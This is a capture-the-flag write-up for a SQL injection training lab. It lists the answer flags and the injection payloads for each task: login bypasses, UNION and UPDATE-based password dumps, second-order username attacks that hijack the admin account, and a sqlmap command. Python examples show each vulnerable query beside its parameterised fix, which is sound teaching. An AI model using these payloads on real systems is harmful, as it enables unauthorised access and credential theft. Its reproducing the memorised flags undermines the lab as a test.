SQL Injection Lab
Table of Contents
- SQL Injection Lab
- Task1 Introduction
- Task2 Introduction to SQL Injection: Part 1
- Task3 Introduction to SQL Injection: Part 2
- Task4 Vulnerable Startup: Broken Authentication
- Task5 Vulnerable Startup: Broken Authentication 2
- Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
- Task7 Vulnerable Startup: Vulnerable Notes
- Task8 Vulnerable Startup: Change Password
- Task9 Vulnerable Startup: Book Title
- Task10 Vulnerable Startup: Book Title 2
Task1 Introduction
Deploy the machine
Task2 Introduction to SQL Injection: Part 1
1. What is the flag for SQL Injection 1: Input Box Non-String?
THM{dccea429d73d4a6b4f117ac64724f460}
Numeric context, universal-password (auth-bypass) login
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=1 or 1=1 -- AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
2. What is the flag for SQL Injection 2: Input Box String?
THM{356e9de6016b9ac34e02df99a5f755ba}
String context, universal-password login
SELECT uid,name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or '1'='1' --' AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
3. What is the flag for SQL Injection 3: URL Injection?
THM{645eab5d34f81981f5705de54e8a9c36}
String context, universal-password login; the front end blocks special characters, so intercept the request in Burp and send the URL-encoded payload
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='1' or 1=1 --' AND password='6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
4. What is the flag for SQL Injection 4: POST Injection?
THM{727334fd0f0ea1b836a8d443f09dc8eb}
String context, universal-password login; the front end blocks special characters, so intercept the request in Burp and write the payload into the POST request body
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or 1=1--' AND password = '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
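The four Task 2 queries all fail for the same reason: the profileID value is pasted into the SQL text, so a quote or a `--` from the input rewrites the WHERE clause. The following is an added example written for this writeup (not the lab's own code) that builds a constructed in-memory SQLite table shaped like the lab's usertable and puts the concatenated login query next to a parameterised one. The table layout, the user alice and her password are assumptions; the hash column mirrors the lab's SHA-256 hex digests.

```python
import hashlib
import sqlite3


def make_db():
    # Constructed sample data, not the lab's real table: one user whose
    # password is stored as a SHA-256 hex digest, as in the lab's usertable.
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE usertable ("
        "uid INTEGER PRIMARY KEY, name TEXT, profileID INTEGER, password TEXT)"
    )
    pw_hash = hashlib.sha256(b"correct-horse").hexdigest()
    con.execute("INSERT INTO usertable VALUES (1, 'alice', 1, ?)", (pw_hash,))
    return con


def login_vulnerable_numeric(con, profile_id, password):
    # Task 2 Q1 shape: profileID is interpolated unquoted, so input such as
    # "1 or 1=1 --" becomes part of the SQL grammar.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (
        f"SELECT uid, name FROM usertable WHERE profileID={profile_id} "
        f"AND password = '{pw_hash}'"
    )
    return con.execute(query).fetchone()


def login_vulnerable_string(con, profile_id, password):
    # Task 2 Q2-Q4 shape: profileID is interpolated inside quotes, so a
    # single quote in the input closes the literal and "--" drops the rest.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (
        f"SELECT uid, name FROM usertable WHERE profileID = '{profile_id}' "
        f"AND password = '{pw_hash}'"
    )
    return con.execute(query).fetchone()


def login_safe(con, profile_id, password):
    # Parameter binding: the driver sends the input as a value, never as SQL,
    # so quotes and comment markers have no syntactic effect. Client-side
    # filtering of special characters (bypassed in Q3/Q4) is not needed here.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = "SELECT uid, name FROM usertable WHERE profileID = ? AND password = ?"
    return con.execute(query, (profile_id, pw_hash)).fetchone()


if __name__ == "__main__":
    con = make_db()
    print(login_vulnerable_numeric(con, "1 or 1=1 --", "wrong"))
    print(login_vulnerable_string(con, "1' or '1'='1' --", "wrong"))
    print(login_safe(con, "1' or '1'='1' --", "wrong"))
    print(login_safe(con, "1", "correct-horse"))
```

Note that the hardened version still hashes the password and compares it in SQL exactly as before; the only change is that the two inputs travel as bound parameters. This is the fix for every login variant in Task 2 regardless of whether the value arrives in the URL, the query string or the POST body.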
Task3 Introduction to SQL Injection: Part 2
What is the flag for SQL Injection 5: UPDATE Statement?
First dump the table names, which are usertable and secrets:
UPDATE usertable SET nickName='',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='',email='123',password='a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3' WHERE UID='6'
Dump the column names, which are id, author and secret:
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
Dump the data:
',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='
Task4 Vulnerable Startup: Broken Authentication
What is the flag for this challenge?
THM{f35f47dcd9d596f0d3860d14cd4c68ec}
Universal-password login bypass
1' or 1=1--
Task5 Vulnerable Startup: Broken Authentication 2
What is the flag for this challenge?
THM{fb381dfee71ef9c31b93625ad540c9fa}
Universal-password login; the top-right corner of the page turns out to be an output position (a reflected column), so
' UNION SELECT 1,group_concat(password) FROM users-- -
dumps the flag.
Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
What is the flag for this challenge?
THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}
sqlmap -u http://IP:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite -a
Task7 Vulnerable Startup: Vulnerable Notes
What is the flag for this challenge?
THM{4644c7e157fd5498e7e4026c89650814}
Second-order injection
Create a new account with the username
'union select 1,group_concat(password) from users'
After logging in, click Notes; the application executes the statement
SELECT title, note FROM notes WHERE username = ''union select 1,group_concat(password) from users''
which dumps all the passwords.
Task8 Vulnerable Startup: Change Password
What is the flag for this challenge?
Second-order injection
Create a user named admin'-- - ; after logging in, the change-password function updates the admin account's password:
UPDATE users SET password = ? WHERE username = 'admin' -- -'
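Tasks 7 and 8 share one defect: registration stores the username safely, but a later query (the notes SELECT in Task 7, the password UPDATE in Task 8) takes that username back out of the session and concatenates it, trusting it because it "came from the database" rather than from the request. The Task 8 query is especially instructive because the password is bound with `?` while the WHERE clause is not. The following is an added example for this writeup, not the lab's code, with a constructed in-memory schema (users, notes), a seeded admin account and invented passwords; it shows both vulnerable queries beside their fully parameterised forms. The same fully bound UPDATE is also the fix for the Task 3 profile update.

```python
import sqlite3


def make_db():
    # Constructed sample schema and rows; not the lab's real database.
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)"
    )
    con.execute("CREATE TABLE notes (username TEXT, title TEXT, note TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin-secret')")
    con.execute("INSERT INTO notes VALUES ('admin', 'todo', 'rotate the API keys')")
    return con


def register(con, username, password):
    # Registration is parameterised, so whatever the username contains is
    # stored verbatim. That is correct; the bug is in what happens later.
    con.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)", (username, password)
    )


def list_notes_vulnerable(con, session_username):
    # Task 7 shape: the username is read from the session, but it is still
    # attacker-chosen data and is concatenated into the query.
    query = f"SELECT title, note FROM notes WHERE username = '{session_username}'"
    return con.execute(query).fetchall()


def list_notes_safe(con, session_username):
    query = "SELECT title, note FROM notes WHERE username = ?"
    return con.execute(query, (session_username,)).fetchall()


def change_password_vulnerable(con, session_username, new_password):
    # Task 8 shape: only the new password is bound; the WHERE clause is
    # built by string formatting, so the session user controls which row
    # gets updated.
    query = f"UPDATE users SET password = ? WHERE username = '{session_username}'"
    con.execute(query, (new_password,))


def change_password_safe(con, session_username, new_password):
    # Every value bound, including the one that came from the session.
    con.execute(
        "UPDATE users SET password = ? WHERE username = ?",
        (new_password, session_username),
    )


def password_of(con, username):
    row = con.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_db()
    register(con, "' UNION SELECT 1,group_concat(password) FROM users-- -", "x")
    print(list_notes_vulnerable(con, "' UNION SELECT 1,group_concat(password) FROM users-- -"))
    print(list_notes_safe(con, "' UNION SELECT 1,group_concat(password) FROM users-- -"))
    register(con, "admin'-- -", "x")
    change_password_vulnerable(con, "admin'-- -", "new-pass")
    print(password_of(con, "admin"))
```

The lesson for code review is that "input" means any value that did not originate in the program itself; a username that was validated or stored safely yesterday is still input today, and a query that binds some values but formats others is as exposed as one that binds none.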
Task9 Vulnerable Startup: Book Title
What is the flag for this challenge?
THM{27f8f7ce3c05ca8d6553bc5948a89210}
SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '-1') union select 1,2,3,group_concat(password) from users-- -%')
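The Task 9 query wraps the search term in `'%...%'` inside a subquery, which is why the payload has to close the quote and the parenthesis before its UNION. Binding a LIKE pattern needs one extra step beyond a plain `?`: the wildcards `%` and `_` are still meaningful inside a bound pattern, so a literal search for those characters must escape them. The following added example (written for this writeup, not the lab's code) uses a constructed books and users schema with invented titles; it shows the concatenated search beside a bound search that escapes wildcards with an ESCAPE clause.

```python
import sqlite3


def make_db():
    # Constructed sample schema and rows; not the lab's real database.
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT, author TEXT, year INTEGER)"
    )
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO books (title, author, year) VALUES (?, ?, ?)",
        [
            ("The Web Application Hacker's Handbook", "Stuttard", 2011),
            ("SQL Antipatterns", "Karwin", 2010),
            ("100% Cotton", "Nobody", 2020),
        ],
    )
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin-secret')")
    return con


def search_vulnerable(con, term):
    # Task 9 shape: the term is formatted into a LIKE literal inside a
    # subquery, so the input can close the literal and the parenthesis.
    query = (
        "SELECT * FROM books WHERE id = "
        f"(SELECT id FROM books WHERE title LIKE '%{term}%')"
    )
    return con.execute(query).fetchall()


def escape_like(term, esc="\\"):
    # Make LIKE metacharacters match themselves. The escape character must
    # be escaped first so it cannot be used to neutralise the others.
    return (
        term.replace(esc, esc + esc)
        .replace("%", esc + "%")
        .replace("_", esc + "_")
    )


def search_safe(con, term):
    # The whole pattern, wildcards included, is built in Python and bound as
    # one value; ESCAPE tells SQLite which character marks a literal % or _.
    pattern = "%" + escape_like(term) + "%"
    query = "SELECT * FROM books WHERE title LIKE ? ESCAPE '\\'"
    return con.execute(query, (pattern,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    probe = "-1') union select 1,2,3,group_concat(password) from users-- -"
    print(search_vulnerable(con, probe))
    print(search_safe(con, probe))
    print(search_safe(con, "SQL"))
    print(search_safe(con, "%"))
```

Without the ESCAPE handling a search for `%` would return every book, which is not an injection but is an information-disclosure and enumeration issue that often accompanies LIKE-based search endpoints. SQLite's LIKE is case-insensitive for ASCII by default, which is why "SQL" matches "SQL Antipatterns" in the example.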
Task10 Vulnerable Startup: Book Title 2
What is the flag for this challenge?
THM{183526c1843c09809695a9979a672f09}